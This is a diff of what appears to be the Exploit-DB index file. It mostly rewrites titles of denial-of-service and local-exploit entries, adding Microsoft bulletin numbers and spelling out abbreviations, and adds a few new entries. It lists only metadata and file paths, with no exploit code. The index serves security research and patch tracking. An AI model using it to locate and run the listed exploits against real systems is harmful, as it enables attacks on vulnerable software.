Player 11.0.5721.5262 - Remote Denial of Service",2011-12-24,Level,windows,dos,0 18272,platforms/windows/dos/18272.py,"Microsoft Windows Explorer - Denial of Service",2011-12-24,Level,windows,dos,0 -18275,platforms/win_x86-64/dos/18275.txt,"Apple Safari - GdiDrawStream BSoD",2011-12-18,webDEViL,win_x86-64,dos,0 +18275,platforms/win_x86-64/dos/18275.txt,"Apple Safari - GdiDrawStream Blue Screen of Death",2011-12-18,webDEViL,win_x86-64,dos,0 18278,platforms/linux/dos/18278.txt,"Nagios Plugins check_ups - Local Buffer Overflow (PoC)",2011-12-26,"Stefan Schurtz",linux,dos,0 18285,platforms/windows/dos/18285.py,"VideoLAN VLC Media Player 1.1.11 - (libav) 'libavcodec_plugin.dll' Denial of Service",2011-12-28,"Mitchell Adair",windows,dos,0 18295,platforms/linux/dos/18295.txt,"lighttpd - Denial of Service (PoC)",2011-12-31,pi3,linux,dos,0 @@ -2127,7 +2127,7 @@ id,file,description,date,author,platform,type,port 18461,platforms/windows/dos/18461.html,"Edraw Diagram Component 5 - ActiveX Buffer Overflow Denial of Service",2012-02-04,"Senator of Pirates",windows,dos,0 18463,platforms/windows/dos/18463.html,"PDF Viewer Component - ActiveX Denial of Service",2012-02-05,"Senator of Pirates",windows,dos,0 18469,platforms/windows/dos/18469.pl,"TYPSoft FTP Server 1.10 - Multiple Commands Denial of Service",2012-02-07,"Balazs Makany",windows,dos,0 -18475,platforms/windows/dos/18475.c,"PeerBlock 1.1 - BSOD Exploit",2012-02-09,shinnai,windows,dos,0 +18475,platforms/windows/dos/18475.c,"PeerBlock 1.1 - Blue Screen of Death Exploit",2012-02-09,shinnai,windows,dos,0 18481,platforms/windows/dos/18481.py,"jetVideo 8.0.2 - Denial of Service",2012-02-10,"Senator of Pirates",windows,dos,0 18488,platforms/windows/dos/18488.txt,"Novell Groupwise Messenger 2.1.0 - Arbitrary Memory Corruption",2012-02-16,"Luigi Auriemma",windows,dos,8300 18489,platforms/windows/dos/18489.txt,"Novell Groupwise Messenger 2.1.0 - Memory Corruption",2012-02-16,"Luigi Auriemma",windows,dos,8300 @@ -2178,7 +2178,7 @@ id,file,description,date,author,platform,type,port 18765,platforms/windows/dos/18765.txt,"Samsung NET-i ware 1.37 - Multiple Vulnerabilities",2012-04-22,"Luigi Auriemma",windows,dos,0 18774,platforms/windows/dos/18774.txt,"Mobipocket Reader 6.2 Build 608 - Buffer Overflow",2012-04-23,shinnai,windows,dos,0 18776,platforms/windows/dos/18776.txt,"BeyondCHM 1.1 - Buffer Overflow",2012-04-24,shinnai,windows,dos,0 -18777,platforms/windows/dos/18777.txt,".NET Framework EncoderParameter - Integer Overflow",2012-04-24,"Akita Software Security",windows,dos,0 +18777,platforms/windows/dos/18777.txt,"Microsoft .NET Framework EncoderParameter - Integer Overflow (MS12-025)",2012-04-24,"Akita Software Security",windows,dos,0 18799,platforms/windows/dos/18799.py,"Remote-Anything Player 5.60.15 - Denial of Service",2012-04-29,"Saint Patrick",windows,dos,0 18795,platforms/windows/dos/18795.py,"Nokia PC Suite Video Manager 7.1.180.64 - '.mp4' Denial of Service",2012-04-27,"Senator of Pirates",windows,dos,0 18816,platforms/windows/dos/18816.py,"LAN Messenger 1.2.28 - Denial of Service",2012-05-01,"Julien Ahrens",windows,dos,0 @@ -2194,7 +2194,7 @@ id,file,description,date,author,platform,type,port 18878,platforms/windows/dos/18878.txt,"Pro-face Pro-Server EX WinGP PC Runtime - Multiple Vulnerabilities",2012-05-14,"Luigi Auriemma",windows,dos,0 18890,platforms/multiple/dos/18890.txt,"Java - Trigerring Java Code from a .SVG Image",2012-05-16,"Nicolas Gregoire",multiple,dos,0 18909,platforms/php/dos/18909.php,"PHP 5.4.3 - wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Dereference",2012-05-21,condis,php,dos,0 -18894,platforms/windows/dos/18894.txt,"Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE PoC (Post MS12-034)",2012-05-18,Cr4sh,windows,dos,0 +18894,platforms/windows/dos/18894.txt,"Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE PoC (MS12-034)",2012-05-18,Cr4sh,windows,dos,0 18902,platforms/windows/dos/18902.rb,"Real-DRAW PRO 5.2.4 - Import File Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0 18903,platforms/windows/dos/18903.rb,"DVD-Lab Studio 1.25 - '.DAL' File Open Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0 18910,platforms/php/dos/18910.php,"PHP 5.4.3 - (com_event_sink) Denial of Service",2012-05-21,condis,php,dos,0 @@ -2343,7 +2343,7 @@ id,file,description,date,author,platform,type,port 19760,platforms/windows/dos/19760.txt,"Pragma Systems InterAccess TelnetD Server 4.0 - Terminal Configuration",2000-02-24,"Ussr Labs",windows,dos,0 19766,platforms/hardware/dos/19766.txt,"Nortel Networks Nautica Marlin - Denial of Service",2000-02-25,"Christophe GRENIER",hardware,dos,0 19772,platforms/windows/dos/19772.txt,"WaveSurfer 1.8.8p4 - Memory Corruption (PoC)",2012-07-12,"Jean Pascal Pereira",windows,dos,0 -19777,platforms/windows/dos/19777.txt,"Microsoft Internet Explorer 9 / SharePoint / Lync - toStaticHTML HTML Sanitizing Bypass",2012-07-12,"Adi Cohen",windows,dos,0 +19777,platforms/windows/dos/19777.txt,"Microsoft Internet Explorer 9 / SharePoint / Lync - toStaticHTML HTML Sanitizing Bypass (MS12-037/MS12-039/MS12-050)",2012-07-12,"Adi Cohen",windows,dos,0 19780,platforms/multiple/dos/19780.txt,"Trend Micro OfficeScan Corporate Edition 3.0/3.5/3.11/3.13 - Denial of Service",2000-02-26,"Jeff Stevens",multiple,dos,0 19782,platforms/windows/dos/19782.pl,"HP OpenView OmniBack II 2.55/3.0/3.1 - Denial of Service",2000-02-28,"Jon Hittner",windows,dos,0 19783,platforms/windows/dos/19783.txt,"Netscape Enterprise Server 3.6 SP2/FastTrack Server 2.0.1 - GET Request",1999-08-25,"ISS X-Force",windows,dos,0 @@ -2383,7 +2383,7 @@ id,file,description,date,author,platform,type,port 19950,platforms/linux/dos/19950.c,"XFree86 X11R6 3.3.5/3.3.6/4.0 Xserver - Denial of Service",2000-05-18,"Chris Evans",linux,dos,0 19961,platforms/windows/dos/19961.txt,"Oracle Outside-In - '.LWP' File Parsing Stack Based Buffer Overflow",2012-07-20,"Francis Provencher",windows,dos,0 19962,platforms/windows/dos/19962.txt,"Oracle Outside-In JP2 - File Parsing Heap Overflow",2012-07-20,"Francis Provencher",windows,dos,0 -19974,platforms/windows/dos/19974.c,"Microsoft Windows Media Services 4.0/4.1 - Denial of Service",2000-05-31,"Kit Knox",windows,dos,0 +19974,platforms/windows/dos/19974.c,"Microsoft Windows Media Services 4.0/4.1 - Denial of Service (MS00-038)",2000-05-31,"Kit Knox",windows,dos,0 19977,platforms/multiple/dos/19977.txt,"Real Networks Real Server 7.0/7.0.1/8.0 Beta - view-source Denial of Service",2000-06-01,"Ussr Labs",multiple,dos,0 19982,platforms/bsd/dos/19982.c,"FreeBSD 3.x/4.0/5.0 / NetBSD 1.4.1/1.4.2 / OpenBSD 2.x - Denial of Service",2000-06-01,"Ussr Labs",bsd,dos,0 19984,platforms/multiple/dos/19984.c,"Eterm 0.8.10 / rxvt 2.6.1 / PuTTY 0.48 / X11R6 3.3.3/4.0 - Denial of Service",2000-05-31,"Kit Knox",multiple,dos,0 @@ -2393,7 +2393,7 @@ id,file,description,date,author,platform,type,port 19994,platforms/windows/dos/19994.c,"Check Point Software Firewall-1 4.0/1 4.1 - Fragmented Packets Denial of Service",2000-05-23,phonix,windows,dos,0 19996,platforms/multiple/dos/19996.txt,"ColdFusion Server 2.0/3.x/4.x - Administrator Login Password Denial of Service",2000-06-07,"Stuart McClure",multiple,dos,0 20005,platforms/windows/dos/20005.c,"Microsoft Windows NT 4.0 - Remote Registry Request Denial of Service (1)",2000-06-08,"Renaud Deraison",windows,dos,0 -20006,platforms/windows/dos/20006.nasl,"Microsoft Windows NT 4.0 - Remote Registry Request Denial of Service (2)",2000-06-08,"Renaud Deraison",windows,dos,0 +20006,platforms/windows/dos/20006.nasl,"Microsoft Windows NT 4.0 - Remote Registry Request Denial of Service (MS00-040) (2)",2000-06-08,"Renaud Deraison",windows,dos,0 20015,platforms/windows/dos/20015.txt,"AnalogX SimpleServer:WWW 1.0.5 - Denial of Service",2000-07-15,"Ussr Labs",windows,dos,0 20016,platforms/windows/dos/20016.py,"Shadow Op Software Dragon Server 1.0/2.0 - Multiple Denial of Service",2000-06-16,Prizm,windows,dos,0 20017,platforms/windows/dos/20017.py,"Max Feoktistov Small HTTP server 1.212 - Buffer Overflow",2000-06-16,"Ussr Labs",windows,dos,0 @@ -2431,7 +2431,7 @@ id,file,description,date,author,platform,type,port 20229,platforms/multiple/dos/20229.txt,"IBM Websphere Application Server 3.0.2 Server Plugin - Denial of Service",2000-09-15,"Rude Yak",multiple,dos,0 20233,platforms/windows/dos/20233.txt,"NetcPlus BrowseGate 2.80 - Denial of Service",2000-09-21,"Delphis Consulting",windows,dos,0 20239,platforms/multiple/dos/20239.txt,"HP OpenView Network Node Manager 6.10 - SNMP Denial of Service",2000-09-26,DCIST,multiple,dos,0 -20254,platforms/windows/dos/20254.txt,"Microsoft Windows NT 4.0 - Invalid LPC Request Denial of Service",2000-10-03,"BindView's Razor Team",windows,dos,0 +20254,platforms/windows/dos/20254.txt,"Microsoft Windows NT 4.0 - Invalid LPC Request Denial of Service (MS00-070)",2000-10-03,"BindView's Razor Team",windows,dos,0 20255,platforms/windows/dos/20255.txt,"Microsoft Windows NT 4.0 / 2000 - LPC Zone Memory Depletion Denial of Service",2000-10-03,"BindView's Razor Team",windows,dos,0 20271,platforms/openbsd/dos/20271.c,"OpenBSD 2.x - Pending ARP Request Remote Denial of Service",2000-10-05,skyper,openbsd,dos,0 20272,platforms/windows/dos/20272.pl,"Apache 1.2.5/1.3.1 / UnityMail 2.0 - MIME Header Denial of Service",1998-08-02,L.Facq,windows,dos,0 @@ -2530,7 +2530,7 @@ id,file,description,date,author,platform,type,port 20834,platforms/windows/dos/20834.txt,"ElectroSoft ElectroComm 1.0/2.0 - Denial of Service",2001-05-07,nemesystm,windows,dos,0 20844,platforms/osx/dos/20844.txt,"Apple Personal Web Sharing 1.1/1.5/1.5.5 - Remote Denial of Service",2001-05-10,"Jass Seljamaa",osx,dos,0 20845,platforms/osx/dos/20845.txt,"Maxum Rumpus FTP Server 1.3.2/1.3.4/2.0.3 dev - Remote Denial of Service",2001-05-15,"Jass Seljamaa",osx,dos,0 -20846,platforms/windows/dos/20846.pl,"Microsoft IIS 4.0/5.0 - FTP Denial of Service",2000-05-14,"Nelson Bunker",windows,dos,0 +20846,platforms/windows/dos/20846.pl,"Microsoft IIS 4.0/5.0 - FTP Denial of Service (MS01-026)",2000-05-14,"Nelson Bunker",windows,dos,0 20847,platforms/hardware/dos/20847.c,"3Com OfficeConnect DSL Router 812 1.1.7/840 1.1.7 - HTTP Port Router Denial of Service",2001-09-21,Sniffer,hardware,dos,0 20852,platforms/multiple/dos/20852.pl,"iPlanet 4.1 Web Publisher - Remote Buffer Overflow (1)",2001-05-15,"Santi Claus",multiple,dos,0 20853,platforms/multiple/dos/20853.php,"iPlanet 4.1 Web Publisher - Remote Buffer Overflow (2)",2001-05-15,"Gabriel Maggiotti",multiple,dos,0 @@ -2920,7 +2920,7 @@ id,file,description,date,author,platform,type,port 22949,platforms/netware/dos/22949.txt,"Novell Netware Enterprise Web Server 5.1/6.0 - CGI2Perl.NLM Buffer Overflow",2003-07-23,"Uffe Nielsen",netware,dos,0 22950,platforms/hardware/dos/22950.txt,"Xavi X7028r DSL Router - UPNP Long Request Denial of Service",2003-07-23,"David F. Madrid",hardware,dos,0 22952,platforms/linux/dos/22952.txt,"xfstt 1.2/1.4 - Unspecified Memory Disclosure",2003-07-23,V9,linux,dos,0 -22957,platforms/windows/dos/22957.cpp,"Microsoft SQL Server 7.0/2000 / MSDE - Named Pipe Denial of Service",2003-07-23,refdom,windows,dos,0 +22957,platforms/windows/dos/22957.cpp,"Microsoft SQL Server 7.0/2000 / MSDE - Named Pipe Denial of Service (MS03-031)",2003-07-23,refdom,windows,dos,0 22962,platforms/hardware/dos/22962.pl,"Cisco Aironet AP1x00 - Malformed HTTP GET Denial of Service",2003-07-28,blackangels,hardware,dos,0 22918,platforms/unix/dos/22918.txt,"IBM U2 UniVerse 10.0.0.9 - uvrestore Buffer Overflow",2003-07-16,kf,unix,dos,0 22920,platforms/unix/dos/22920.txt,"IBM U2 UniVerse 10.0.0.9 - UVADMSH Buffer Overflow",2003-07-16,kf,unix,dos,0 @@ -3038,7 +3038,7 @@ id,file,description,date,author,platform,type,port 23496,platforms/windows/dos/23496.txt,"DIMIN Viewer 5.4.0 - GIF Decode Crash (PoC)",2012-12-19,"Lizhi Wang",windows,dos,0 23693,platforms/windows/dos/23693.txt,"Sami FTP Server 1.1.3 - Library Crafted GET Request Remote Denial of Service",2004-02-13,"intuit e.b.",windows,dos,0 23501,platforms/windows/dos/23501.c,"Alt-N MDaemon 6.x/WorldClient - Form2Raw Raw Message Handler Buffer Overflow (1)",2003-12-29,"Behrang Fouladi",windows,dos,0 -23504,platforms/windows/dos/23504.txt,"Microsoft Windows XP/2000 - showHelp CHM File Execution",2003-12-30,"Arman Nayyeri",windows,dos,0 +23504,platforms/windows/dos/23504.txt,"Microsoft Windows XP/2000 - showHelp '.CHM' File Execution (MS03-004)",2003-12-30,"Arman Nayyeri",windows,dos,0 23505,platforms/osx/dos/23505.c,"Apple Mac OSX 10.x - SecurityServer Daemon Local Denial of Service",2003-12-30,"Matt Burnett",osx,dos,0 23506,platforms/windows/dos/23506.txt,"GoodTech Telnet Server 4.0 - Remote Denial of Service",2004-01-02,"Donato Ferrante",windows,dos,0 23508,platforms/hardware/dos/23508.txt,"YaSoft Switch Off 2.3 - Large Packet Remote Denial of Service",2004-01-02,"Peter Winter-Smith",hardware,dos,0 @@ -3421,7 +3421,7 @@ id,file,description,date,author,platform,type,port 26325,platforms/multiple/dos/26325.txt,"Mozilla Firefox 1.0.6/1.0.7 - IFRAME Handling Denial of Service",2005-10-05,"Tom Ferris",multiple,dos,0 26336,platforms/multiple/dos/26336.txt,"Oracle Forms - Servlet TLS Listener Remote Denial of Service",2005-10-07,"Alexander Kornbrust",multiple,dos,0 26340,platforms/linux/dos/26340.c,"Up-IMAPProxy 1.2.3/1.2.4 - Multiple Unspecified Remote Format String Vulnerabilities",2005-10-10,"Steve Kemp",linux,dos,0 -26341,platforms/windows/dos/26341.txt,"Microsoft Windows 2000/2003/XP - MSDTC TIP Denial of Service",2005-10-11,anonymous,windows,dos,0 +26341,platforms/windows/dos/26341.txt,"Microsoft Windows 2000/2003/XP - MSDTC TIP Denial of Service (MS05-051)",2005-10-11,anonymous,windows,dos,0 26342,platforms/linux/dos/26342.txt,"RARLAB WinRar 2.90/3.x - UUE/XXE Invalid Filename Error Message Format String",2005-10-11,"Tan Chew Keong",linux,dos,0 26382,platforms/linux/dos/26382.c,"Linux Kernel 2.6.x - IPv6 Local Denial of Service",2005-10-20,"Rémi Denis-Courmont",linux,dos,0 26413,platforms/windows/dos/26413.py,"PEiD 0.95 - Memory Corruption (PoC)",2013-06-24,"Debasish Mandal",windows,dos,0 @@ -3457,7 +3457,7 @@ id,file,description,date,author,platform,type,port 26833,platforms/hardware/dos/26833.txt,"Multiple Unspecified Cisco Catalyst Switches - LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",hardware,dos,0 26834,platforms/hardware/dos/26834.txt,"Westell Versalink 327W - LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",hardware,dos,0 26835,platforms/hardware/dos/26835.txt,"Scientific Atlanta DPX2100 Cable Modem - LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",hardware,dos,0 -26869,platforms/windows/dos/26869.txt,"Microsoft Excel 95/97/2000/2002/2003/2004 - Unspecified Memory Corruption Vulnerabilities",2005-12-19,ad@heapoverflow.com,windows,dos,0 +26869,platforms/windows/dos/26869.txt,"Microsoft Excel 95/97/2000/2002/2003/2004 - Unspecified Memory Corruption Vulnerabilities (MS06-012)",2005-12-19,ad@heapoverflow.com,windows,dos,0 26886,platforms/linux/dos/26886.pl,"Squid 3.3.5 - Denial of Service (PoC)",2013-07-16,kingcope,linux,dos,0 26887,platforms/linux/dos/26887.rb,"rpcbind - (CALLIT procedure) UDP Crash (PoC)",2013-07-16,"Sean Verity",linux,dos,0 26891,platforms/windows/dos/26891.py,"Light Audio Mixer 1.0.12 - '.wav' Crash (PoC)",2013-07-16,ariarat,windows,dos,0 @@ -3474,7 +3474,7 @@ id,file,description,date,author,platform,type,port 27043,platforms/hardware/dos/27043.py,"Samsung PS50C7700 TV - Denial of Service",2013-07-23,"Malik Mesellem",hardware,dos,5600 27047,platforms/windows/dos/27047.txt,"Artweaver 3.1.5 - '.awd' Buffer Overflow",2013-07-23,"Core Security",windows,dos,0 27049,platforms/windows/dos/27049.txt,"XnView 2.03 - '.pct' Buffer Overflow",2013-07-23,"Core Security",windows,dos,0 -27050,platforms/windows/dos/27050.txt,"DirectShow - Arbitrary Memory Overwrite (MS13-056)",2013-07-23,"Andrés Gómez Ramírez",windows,dos,0 +27050,platforms/windows/dos/27050.txt,"Microsoft DirectShow - Arbitrary Memory Overwrite (MS13-056)",2013-07-23,"Andrés Gómez Ramírez",windows,dos,0 27051,platforms/windows/dos/27051.txt,"Microsoft Windows - Graphics Rendering Engine Multiple Memory Corruption Vulnerabilities",2006-01-09,cocoruder,windows,dos,0 27055,platforms/windows/dos/27055.txt,"Microsoft Excel 95 < 2004 - Malformed Graphic File Code Execution",2006-01-09,ad@heapoverflow.com,windows,dos,0 27069,platforms/windows/dos/27069.txt,"Apple QuickTime 6.4/6.5/7.0.x - PictureViewer JPEG/PICT File Buffer Overflow",2006-01-11,"Dennis Rand",windows,dos,0 @@ -3970,7 +3970,7 @@ id,file,description,date,author,platform,type,port 31553,platforms/linux/dos/31553.txt,"Wireshark 0.99.8 - LDAP Dissector Unspecified Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0 31554,platforms/linux/dos/31554.txt,"Wireshark 0.99.8 - SCCP Dissector Decode As Feature Unspecified Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0 31563,platforms/windows/dos/31563.txt,"SLMail Pro 6.3.1.0 - Multiple Remote Denial of Service / Memory Corruption Vulnerabilities",2008-03-31,"Luigi Auriemma",windows,dos,0 -31585,platforms/windows/dos/31585.c,"Microsoft Windows XP/Vista/2000/2003/2008 Kernel - Usermode Callback Privilege Escalation (1)",2008-04-08,Whitecell,windows,dos,0 +31585,platforms/windows/dos/31585.c,"Microsoft Windows XP/Vista/2000/2003/2008 Kernel - Usermode Callback Privilege Escalation (MS08-025) (1)",2008-04-08,Whitecell,windows,dos,0 31592,platforms/windows/dos/31592.txt,"Microsoft Internet Explorer 8 Beta 1 - XDR Prototype Hijacking Denial of Service",2008-04-02,"The Hacker Webzine",windows,dos,0 31593,platforms/windows/dos/31593.txt,"Microsoft Internet Explorer 8 Beta 1 - 'ieframe.dll' Script Injection",2008-04-02,"The Hacker Webzine",windows,dos,0 31594,platforms/linux/dos/31594.html,"Opera Web Browser 9.26 - Multiple Security Vulnerabilities",2008-04-03,"Michal Zalewski",linux,dos,0 @@ -4475,7 +4475,7 @@ id,file,description,date,author,platform,type,port 36267,platforms/linux/dos/36267.c,"Linux Kernel 3.15.6 - PPP-over-L2TP Socket Level Handling Crash (PoC)",2015-03-04,"Emeric Nasi",linux,dos,0 36268,platforms/linux/dos/36268.c,"Linux Kernel 3.16.3 - Associative Array Garbage Collection Crash (PoC)",2015-03-04,"Emeric Nasi",linux,dos,0 36271,platforms/osx/dos/36271.py,"Apple Mac OSX 10.6.5 / iOS 4.3.3 Mail - Denial of Service",2011-10-29,shebang42,osx,dos,0 -36285,platforms/windows/dos/36285.c,"Microsoft Windows - TCP/IP Stack Reference Counter Integer Overflow",2011-11-08,anonymous,windows,dos,0 +36285,platforms/windows/dos/36285.c,"Microsoft Windows - TCP/IP Stack Reference Counter Integer Overflow (MS11-083)",2011-11-08,anonymous,windows,dos,0 36288,platforms/multiple/dos/36288.php,"Multiple Vendors - libc 'regcomp()' Stack Exhaustion Denial of Service",2011-11-04,"Maksymilian Arciemowicz",multiple,dos,0 36300,platforms/windows/dos/36300.py,"Kool Media Converter 2.6.0 - '.ogg' File Buffer Overflow",2011-11-11,swami,windows,dos,0 36309,platforms/hardware/dos/36309.py,"Sagem F@st 3304-V2 - Telnet Crash (PoC)",2015-03-08,"Loudiyi Mohamed",hardware,dos,0 @@ -4668,7 +4668,7 @@ id,file,description,date,author,platform,type,port 37920,platforms/windows/dos/37920.txt,"Microsoft Windows - 'ATMFD.DLL' Write to Uninitialized Address Due to - Malformed CFF Table",2015-08-21,"Google Security Research",windows,dos,0 37921,platforms/windows/dos/37921.txt,"Microsoft Windows - 'ATMFD.dll' CFF table (ATMFD+0x3440b / ATMFD+0x3440e) Invalid Memory Access",2015-08-21,"Google Security Research",windows,dos,0 37922,platforms/windows/dos/37922.txt,"Microsoft Windows - 'ATMFD.DLL' CFF table (ATMFD+0x34072 - / ATMFD+0x3407b) Invalid Memory Access",2015-08-21,"Google Security Research",windows,dos,0 -37923,platforms/windows/dos/37923.txt,"Microsoft Windows - 'ATMFD.dll' CharString Stream Out-of-Bounds Reads",2015-08-21,"Google Security Research",windows,dos,0 +37923,platforms/windows/dos/37923.txt,"Microsoft Windows - 'ATMFD.dll' CharString Stream Out-of-Bounds Reads (MS15-021)",2015-08-21,"Google Security Research",windows,dos,0 37924,platforms/windows/dos/37924.txt,"Microsoft Office 2007 - MSPTLS Heap Index Integer Underflow (MS15-081)",2015-08-21,"Google Security Research",windows,dos,0 37954,platforms/windows/dos/37954.py,"Mock SMTP Server 1.0 - Remote Crash (PoC)",2015-08-24,"Shankar Damodaran",windows,dos,25 37957,platforms/windows/dos/37957.txt,"GOM Audio 2.0.8 - '.gas' Crash (PoC)",2015-08-24,Un_N0n,windows,dos,0 @@ -4812,7 +4812,7 @@ id,file,description,date,author,platform,type,port 38759,platforms/windows/dos/38759.py,"SuperScan 4.1 - Tools Hostname/IP/URL Field Buffer Overflow",2015-11-19,"Luis Martínez",windows,dos,0 38760,platforms/windows/dos/38760.py,"SuperScan 4.1 - Windows Enumeration Hostname/IP/URL Field SEH Overflow",2015-11-19,"Luis Martínez",windows,dos,0 38761,platforms/windows/dos/38761.py,"Sam Spade 1.14 - Decode URL Buffer Overflow Crash (PoC)",2015-11-19,"Vivek Mahajan",windows,dos,0 -38763,platforms/lin_x86/dos/38763.txt,"Google Chrome - open-vcdiff OOB Read in Browser Process Integer Overflow",2015-11-19,"Google Security Research",lin_x86,dos,0 +38763,platforms/lin_x86/dos/38763.txt,"Google Chrome - open-vcdiff Out-of-Bounds Read in Browser Process Integer Overflow",2015-11-19,"Google Security Research",lin_x86,dos,0 38771,platforms/windows/dos/38771.py,"ShareKM - Remote Denial of Service",2013-09-22,"Yuda Prawira",windows,dos,0 38778,platforms/linux/dos/38778.txt,"Blue Coat ProxySG 5.x - and Security Gateway OS Denial of Service",2013-09-23,anonymous,linux,dos,0 38779,platforms/multiple/dos/38779.py,"Abuse HTTP Server - Remote Denial of Service",2013-09-30,"Zico Ekel",multiple,dos,0 @@ -4833,7 +4833,7 @@ id,file,description,date,author,platform,type,port 38916,platforms/windows/dos/38916.html,"Microsoft Internet Explorer 11.0.9600.18097 - COmWindowProxy::SwitchMarkup NULL PTR",2015-12-09,"Marcin Ressel",windows,dos,0 38917,platforms/osx/dos/38917.txt,"Apple Mac OSX 10.11 - FTS Deep Structure of the File System Buffer Overflow",2015-12-09,"Maksymilian Arciemowicz",osx,dos,0 38930,platforms/multiple/dos/38930.txt,"Rar - CmdExtract::UnstoreFile Integer Truncation Memory Corruption",2015-12-10,"Google Security Research",multiple,dos,0 -38931,platforms/multiple/dos/38931.txt,"Avast! - OOB Write Decrypting PEncrypt Packed executables",2015-12-10,"Google Security Research",multiple,dos,0 +38931,platforms/multiple/dos/38931.txt,"Avast! - Out-of-Bounds Write Decrypting PEncrypt Packed executables",2015-12-10,"Google Security Research",multiple,dos,0 38932,platforms/multiple/dos/38932.txt,"Avast! - JetDb::IsExploited4x Performs Unbounded Search on Input",2015-12-10,"Google Security Research",multiple,dos,0 38933,platforms/multiple/dos/38933.txt,"Avast! - Heap Overflow Unpacking MoleBox Archives",2015-12-10,"Google Security Research",multiple,dos,0 38934,platforms/windows/dos/38934.txt,"Avast! - Integer Overflow Verifying numFonts in TTC Header",2015-12-10,"Google Security Research",windows,dos,0 @@ -4922,7 +4922,7 @@ id,file,description,date,author,platform,type,port 39221,platforms/win_x86-64/dos/39221.txt,"Adobe Flash - Use-After-Free When Setting Stage",2016-01-11,"Google Security Research",win_x86-64,dos,0 39229,platforms/linux/dos/39229.cpp,"Grassroots DICOM (GDCM) 2.6.0 and 2.6.1 - ImageRegionReader::ReadIntoBuffer Buffer Overflow",2016-01-12,"Stelios Tsampas",linux,dos,0 39232,platforms/windows/dos/39232.txt,"Microsoft Windows = devenum.dll!DeviceMoniker::Load() Heap Corruption Buffer Underflow (MS16-007)",2016-01-13,"Google Security Research",windows,dos,0 -39233,platforms/windows/dos/39233.txt,"Microsoft Office - COM Object DLL Planting with 'WMALFXGFXDSP.dll' (MS16-007)",2016-01-13,"Google Security Research",windows,dos,0 +39233,platforms/windows/dos/39233.txt,"Microsoft Office / COM Object - 'WMALFXGFXDSP.dll' DLL Planting (MS16-007)",2016-01-13,"Google Security Research",windows,dos,0 39242,platforms/windows/dos/39242.py,"NetSchedScan 1.0 - Crash (PoC)",2016-01-15,"Abraham Espinosa",windows,dos,0 39371,platforms/osx/dos/39371.c,"Apple Mac OSX - IOBluetoothHCIPacketLogUserClient Memory Corruption",2016-01-28,"Google Security Research",osx,dos,0 39372,platforms/osx/dos/39372.c,"Apple Mac OSX - IOBluetoothHCIUserClient Arbitrary Kernel Code Execution",2016-01-28,"Google Security Research",osx,dos,0 @@ -5142,7 +5142,7 @@ id,file,description,date,author,platform,type,port 39924,platforms/osx/dos/39924.c,"Apple Mac OSX Kernel - Exploitable NULL Dereference in IOAccelSharedUserClient2::page_off_resource",2016-06-10,"Google Security Research",osx,dos,0 39925,platforms/osx/dos/39925.c,"Apple Mac OSX Kernel - Exploitable NULL Dereference in CoreCaptureResponder Due to Unchecked Return Value",2016-06-10,"Google Security Research",osx,dos,0 39926,platforms/osx/dos/39926.c,"Apple Mac OSX Kernel - Exploitable Null Pointer Dereference in IOAudioEngine",2016-06-10,"Google Security Research",osx,dos,0 -39927,platforms/osx/dos/39927.c,"Apple Mac OSX Kernel - OOB Read of Object Pointer Due to Insufficient Checks in Raw Cast to enum Type",2016-06-10,"Google Security Research",osx,dos,0 +39927,platforms/osx/dos/39927.c,"Apple Mac OSX Kernel - Out-of-Bounds Read of Object Pointer Due to Insufficient Checks in Raw Cast to enum Type",2016-06-10,"Google Security Research",osx,dos,0 39928,platforms/osx/dos/39928.c,"Apple Mac OSX Kernel - Use-After-Free Due to Bad Locking in IOAcceleratorFamily2",2016-06-10,"Google Security Research",osx,dos,0 39929,platforms/multiple/dos/39929.c,"Apple Mac OSX / iOS Kernel - UAF Racing getProperty on IOHDIXController and testNetBootMethod on IOHDIXControllerUserClient",2016-06-10,"Google Security Research",multiple,dos,0 39930,platforms/osx/dos/39930.c,"Apple Mac OSX Kernel - GeForce GPU Driver Stack Buffer Overflow",2016-06-10,"Google Security Research",osx,dos,0 @@ -5265,6 +5265,12 @@ id,file,description,date,author,platform,type,port 40762,platforms/linux/dos/40762.c,"Linux Kernel (Ubuntu / RedHat) - 'keyctl' Null Pointer Dereference",2016-11-15,"OpenSource Security",linux,dos,0 40766,platforms/windows/dos/40766.txt,"Microsoft Windows Kernel - Registry Hive Loading 'nt!RtlEqualSid' Out-of-Bounds Read (MS16-138)",2016-11-15,"Google Security Research",windows,dos,0 40773,platforms/windows/dos/40773.html,"Microsoft Edge - 'eval' Type Confusion",2016-11-17,"Google Security Research",windows,dos,0 +40787,platforms/windows/dos/40787.html,"Microsoft Edge - 'Array.splice' Heap Overflow",2016-11-18,"Google Security Research",windows,dos,0 +40779,platforms/windows/dos/40779.py,"Moxa SoftCMS 1.5 - Denial of Service (PoC)",2016-11-18,"Zhou Yu",windows,dos,0 +40784,platforms/windows/dos/40784.html,"Microsoft Edge - 'FillFromPrototypes' Type Confusion",2016-11-18,"Google Security Research",windows,dos,0 +40785,platforms/windows/dos/40785.html,"Microsoft Edge - 'Array.filter' Info Leak",2016-11-18,"Google Security Research",windows,dos,0 +40786,platforms/windows/dos/40786.html,"Microsoft Edge - 'Array.reverse' Overflow",2016-11-18,"Google Security Research",windows,dos,0 +40790,platforms/linux/dos/40790.txt,"Palo Alto Networks PanOS appweb3 - Stack Buffer Overflow",2016-11-18,"Google Security Research",linux,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -5369,11 +5375,11 @@ id,file,description,date,author,platform,type,port 338,platforms/solaris/local/338.c,"Solaris 5.5.1 X11R6.3 - xterm (-xrm) Privilege Escalation",1997-05-28,"David Hedley",solaris,local,0 339,platforms/linux/local/339.c,"zgv - '$HOME' Buffer 